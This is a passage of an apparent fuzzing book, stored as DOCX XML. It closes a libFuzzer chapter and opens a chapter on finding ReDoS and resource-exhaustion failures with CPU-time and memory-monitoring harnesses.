        <w:t xml:space="preserve">For libraries that process user data—​JSON parsers, image decoders, cryptographic functions—​design harnesses that exercise the complete API surface under edge conditions. This approach finds failures in library implementation that could affect all applications using the library.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build verification into your library testing workflow. Since libraries serve as foundations for multiple applications, reliability problems can have widespread impact. Thorough library testing provides confidence that applications built on these foundations inherit robust input processing capabilities.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="71"/>
    <w:bookmarkStart w:id="72" w:name="X1a44e009ea2d45bda6c5cd01a844913da0e38f8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Combine Techniques for Production-Scale Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Real applications require combining all the libFuzzer techniques you’ve learned: basic harness development, sanitizer integration, structured input generation, performance optimization, and systematic debugging. This integration demonstrates mastery while preparing you for the complex scenarios in Part II.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Production-scale integration shows how individual techniques combine into comprehensive reliability verification. Your email validation harness demonstrates basic concepts, JSON API testing shows structured input generation, sanitizers provide immediate feedback, performance optimization enables systematic exploration, and debugging techniques transform discoveries into fixes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The integration process starts with identifying your application’s most critical input processing functions. Focus on code that handles external data and could cause service outages: API request processing, configuration loading, user input validation, and data format parsing. These represent your highest-value testing targets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build comprehensive harnesses that exercise these functions under realistic conditions. Combine structured input generation with performance optimization to enable systematic exploration. Integrate sanitizers for immediate failure detection. Apply debugging techniques to transform discoveries into reliable fixes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Measure the cumulative effect of your testing improvements. Compare your application’s reliability before and after systematic libFuzzer testing: crashes discovered and fixed, coverage achieved, and confidence gained in edge case handling. This measurement demonstrates the transformation from hope-based to evidence-based reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document your complete workflow from initial harness development through fix verification. This documentation serves as a template for applying similar approaches to other applications and provides evidence of your systematic reliability improvement process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This production-scale integration prepares you perfectly for Part II where you’ll apply identical concepts to Java applications with Jazzer, Python web services with Atheris, and JavaScript applications with Jazzer.js. The fundamental approach remains the same—​only the syntax and runtime environments change.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="72"/>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkStart w:id="74" w:name="X9ca9b6defa94209bd760ca3b048296882e963d7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter Summary: Your Foundation for Systematic Reliability Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You now have practical mastery of libFuzzer that transforms input processing reliability from guesswork into systematic verification. More importantly, you’ve built the confidence and skills that transfer directly to Part II where you’ll apply identical concepts across Java, Python, and JavaScript applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hands-On Skills You Can Apply Immediately:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve built working harnesses that systematically explore edge cases, discovering crashes that manual testing would miss. Your email validation harness demonstrates the basic workflow you’ll use across all fuzzing: convert input formats, explore systematically, and find real failures. This same pattern works identically in Jazzer for Java APIs, Atheris for Python web services, and Jazzer.js for JavaScript applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve integrated sanitizers that catch memory corruption and undefined behavior instantly, transforming hours of debugging into immediate problem identification. The AddressSanitizer workflow you’ve mastered—​compile with appropriate flags, run fuzzing campaigns, analyze diagnostic output—​applies directly to memory-managed languages through their respective sanitizer implementations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve implemented structured input generation for complex data formats like JSON, maintaining validity while exploring failure-inducing edge cases. This approach finds the deep processing failures that cause production outages rather than just testing format parsing. You’ll apply identical structured generation principles to REST APIs in Java, web frameworks in Python, and API endpoints in JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performance and Debugging Expertise:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve optimized fuzzing performance through persistent mode, corpus management, and systematic monitoring. These performance principles become essential in Part II where you’ll be running enterprise-scale fuzzing campaigns across multiple languages and applications. The performance mindset you’ve developed—​measuring throughput, managing corpora, optimizing harnesses—​scales directly to production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve mastered crash debugging through input minimization, sanitizer analysis, and systematic fix verification. These debugging skills translate across all languages because the fundamental approach—​minimize reproduction cases, understand root causes, verify fixes thoroughly—​remains constant whether you’re debugging C++ buffer overflows, Java exceptions, Python crashes, or JavaScript runtime errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Confidence Transformation Achieved:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve experienced the transformation from "I hope my input processing works" to "I’ve systematically verified it handles edge cases correctly." This confidence shift—​from hope-based to evidence-based reliability—​represents the core value of systematic fuzzing that you’ll apply across your entire technology stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When colleagues ask whether your API handles edge cases correctly, you can now answer with concrete evidence: "I systematically tested 2.3 million input combinations and found and fixed 5 edge case failures." This evidence-based confidence becomes your standard approach to reliability verification across all applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Preparation for Multi-Language Application:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The libFuzzer concepts you’ve mastered form the universal foundation for coverage-guided fuzzing across all languages. The harness development patterns, systematic exploration approach, and reliability thinking transfer directly to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Jazzer for Java:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Same coverage-guided exploration, same harness patterns, same systematic approach to API testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Atheris for Python:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Identical workflow for web service testing, same performance optimization principles, same debugging mindset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Jazzer.js for JavaScript:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Same structured input generation, same fix verification approach, same confidence-building process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You understand how coverage feedback drives systematic exploration, how sanitizers provide immediate failure detection, and how structured input generation finds deep processing failures. These fundamental concepts remain identical across all language-specific fuzzing tools—​only the syntax and runtime environments change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Action Items:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply these techniques to your most critical input processing functions right now. Choose functions that handle external data and could cause service outages: API request processing, user input validation, configuration loading, and data format parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build harnesses for these functions using the patterns you’ve learned. Run 30-minute fuzzing campaigns with sanitizer integration. Document the failures you discover and the confidence you gain through systematic verification. This immediate application solidifies your skills while providing tangible reliability improvements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start with your email validation, JSON API processing, or configuration parsing—​whatever handles the most critical external input in your applications. The failures you discover and fix represent prevented production outages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ready for Part II: Language-Specific Mastery:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You now have the conceptual foundation and practical skills to apply systematic reliability testing across Java microservices, Python web applications, and JavaScript services. Part II will show you how the same systematic approach adapts to each language’s specific characteristics while maintaining the reliability focus you’ve developed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 3 begins Part II by taking your libFuzzer foundation and applying it to Java applications with Jazzer. You’ll see how the harness patterns, structured input generation, and systematic exploration you’ve mastered translate to testing Spring Boot APIs, processing complex Java objects, and integrating with Java development workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The confidence you’ve built in systematic reliability verification becomes your approach to preventing input processing failures across your entire technology stack. From C++ foundation libraries to Java microservices to Python web backends to JavaScript frontend processing—​you now have the systematic approach that transforms reliability from reactive debugging into proactive verification.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:pp: ++</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:id="122" w:name="Xb4aa1a9398ee448bff5dc10b5ac6376771d2119"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 3: Discover Logic and Performance Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tool Requirements:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Performance profiling tools, libFuzzer with custom harnesses, Docker, monitoring tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Learning Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build performance fuzzers that find ReDoS bugs causing service outages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor resource usage during fuzzing to catch memory exhaustion scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test logic failures that cause data corruption and service inconsistency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Focus on reliability failures that actually impact production services</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="76" w:name="X6aefda1467adb4868e5e3264d8c19c56846d340"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Silent Killers of Service Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve mastered crash discovery through AFL++ and libFuzzer. Your containers are humming along, finding memory corruption bugs that would have taken down your services. But here’s the thing—​some of the most devastating production failures never generate a single crash dump.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Picture this: Your API is running perfectly. Memory usage looks normal. No segmentation faults in your logs. Then, at 2 AM, your monitoring system starts screaming. Response times have gone from 50 milliseconds to 30 seconds. Your load balancer is timing out requests. Customers can’t complete transactions. Your service is effectively down, yet every process is still running.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Welcome to the world of logic and performance failures—​the silent assassins of service reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional crash-focused fuzzing operates under a simple assumption: bad input causes crashes, crashes are bad, therefore we find crashes. This approach works brilliantly for memory corruption, but it misses an entire category of reliability failures that manifest as performance degradation, resource exhaustion, and incorrect program behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These failures are particularly insidious because they often develop gradually. A regular expression that performs poorly on certain inputs might run fine during development and testing, only to bring down your production service when a malicious user discovers the pathological case. A caching mechanism might work perfectly for normal usage patterns but consume unbounded memory when presented with adversarial input sequences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The techniques you’ll learn in this chapter extend your reliability testing beyond the crash-and-burn scenarios into the subtle territory where services fail gracefully but catastrophically. You’ll build harnesses that monitor CPU consumption in real-time, detect memory growth patterns that indicate resource leaks, and identify logic errors that corrupt data without triggering obvious failure modes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="76"/>
    <w:bookmarkStart w:id="81" w:name="X6f3bd3b1e8e778361a007aa710176a5c69ea25b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regular Expression Denial of Service: Extending Your libFuzzer Arsenal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your libFuzzer harnesses from Chapter 2 excel at finding input processing crashes. Now you’ll extend them to catch something more subtle: regexes that consume exponential CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ReDoS isn’t theoretical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stack Overflow was taken down by a single malformed post that triggered catastrophic backtracking in their regex engine. The fix? A 30-character input limit. One line of code preventing exponential CPU consumption.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="77" w:name="X4e35861a2cb6a9755827f443da82e0acc62a8c8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your 30-Minute ReDoS Discovery Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build this on your existing libFuzzer infrastructure from Chapter 2. Same Docker containers. Same compilation flags. Just add CPU monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your harness measures CPU time per regex operation. When execution time exceeds your threshold (start with 100ms), you’ve found a ReDoS vulnerability. libFuzzer’s coverage-guided exploration systematically finds the input patterns that trigger exponential behavior—​the same intelligent exploration that found memory corruption in Chapters 1 and 2, now applied to performance pathologies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most ReDoS vulnerabilities emerge from regex patterns with nested quantifiers. Your fuzzer will automatically discover the specific input patterns that trigger exponential behavior in your application’s actual regex patterns.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="77"/>
    <w:bookmarkStart w:id="78" w:name="X4b46cb17dc1ce4032e9be2288038789755ba158"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building ReDoS Detection Harnesses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your fuzzing approach to ReDoS discovery leverages libFuzzer’s systematic input generation combined with real-time performance monitoring. Unlike crash discovery, where you know immediately when you’ve found a problem, ReDoS detection requires measuring execution time and CPU consumption during regex evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The key insight is creating harnesses that can distinguish between legitimate slow operations and pathological exponential behavior. You don’t want to flag every regex that takes 10 milliseconds to execute, but you absolutely want to catch patterns that consume 10 seconds or more of CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start by identifying the regex patterns in your application that process user-controlled input. Email validation routines are prime candidates, as are URL parsing functions, configuration file processing, and any content filtering mechanisms. Extract these patterns into isolated test harnesses where you can control the input precisely and measure execution time accurately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your monitoring approach needs to account for the difference between wall-clock time and CPU time. A regex might appear slow because your system is under load, but true ReDoS vulnerabilities consume actual CPU cycles in exponential quantities. Use process-specific CPU time measurements rather than simple elapsed time to avoid false positives.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="78"/>
    <w:bookmarkStart w:id="79" w:name="X1c7b7b030f4fcb1e6b1ee93ae1a0a9424a50876"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Email Validation: Your First ReDoS Target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Grab the email validation regex from your application. Copy it into a libFuzzer harness. Run for 15 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll probably find a ReDoS vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Email validation is ReDoS paradise. Complex RFC compliance requirements drive developers toward intricate regex patterns with nested quantifiers and alternation groups. Every registration form, password reset, and contact endpoint becomes a potential CPU exhaustion vector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start with your actual email validation pattern. Not a toy example—​the real regex your application uses in production. Extract it into a standalone harness using the libFuzzer pattern from Chapter 2. Add CPU time monitoring to catch exponential behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The seeds matter here. Begin with legitimate email addresses, then let libFuzzer systematically mutate them. It will discover the pathological inputs: emails with deeply nested subdomain patterns, local parts with repeated characters that stress quantifier groups, and malformed addresses that trigger extensive backtracking before final rejection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your fuzzer will typically find ReDoS patterns within thousands of test cases rather than millions. The exponential behavior creates a clear signal that separates normal processing from pathological cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remember: You’re not looking for crashes. You’re measuring CPU time and flagging operations that exceed reasonable thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You now have working ReDoS detection running in your Docker environment, extending the libFuzzer techniques from Chapter 2 with CPU monitoring. Email validation testing typically finds ReDoS vulnerabilities within 15 minutes when they exist. The same systematic approach applies to any regex that processes user input.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkStart w:id="80" w:name="Xdb584686c32ac2b12e34739f5bd8a703c5ea527"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL Parsing: Scaling Your ReDoS Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your email validation ReDoS fuzzer proves the technique works. Now scale it to URL parsing—​another regex-heavy area where exponential backtracking hides in complex validation patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL parsing regex patterns often try to validate scheme, authority, path, query, and fragment components in a single expression. This complexity creates multiple nested quantifier opportunities where input can trigger exponential behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build this fuzzer using identical infrastructure to your email validation container. Same libFuzzer compilation. Same CPU monitoring wrapper. Just different seed inputs and mutation patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Focus on the URL patterns your application actually processes: routing validation, redirect target checking, webhook URL verification. Extract these real regex patterns rather than testing against toy examples.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The mutation strategy differs from email fuzzing. URLs have hierarchical structure that creates different exponential opportunities: deeply nested path components, long subdomain chains, repeated query parameters. Let libFuzzer explore these dimensions systematically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most URL ReDoS vulnerabilities emerge from path processing patterns that use nested quantifiers to handle directory structures. Input like</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/a/a/a/a/a/a/a/a/X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">can trigger exponential behavior in poorly constructed path validation expressions.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkEnd w:id="81"/>
    <w:bookmarkStart w:id="86" w:name="X85cc287bd4e7b8a22a044c51564cbe7633e88e7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource Monitoring: Extending Performance Detection to Memory Exhaustion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your performance monitoring harnesses detect CPU exhaustion during input processing. Now extend the same monitoring pattern to memory consumption—​building your comprehensive reliability detection capability systematically.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="82" w:name="X18062662d6e6288add8de03b19bb3168e2b57ee"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Progressive Monitoring Expansion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The pattern builds naturally from performance monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performance monitoring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Detect when CPU time exceeds thresholds during input processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Resource monitoring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Detect when memory consumption exceeds thresholds during input processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Same systematic exploration. Same harness foundation. Expanded monitoring scope.</w:t>
      </w:r>
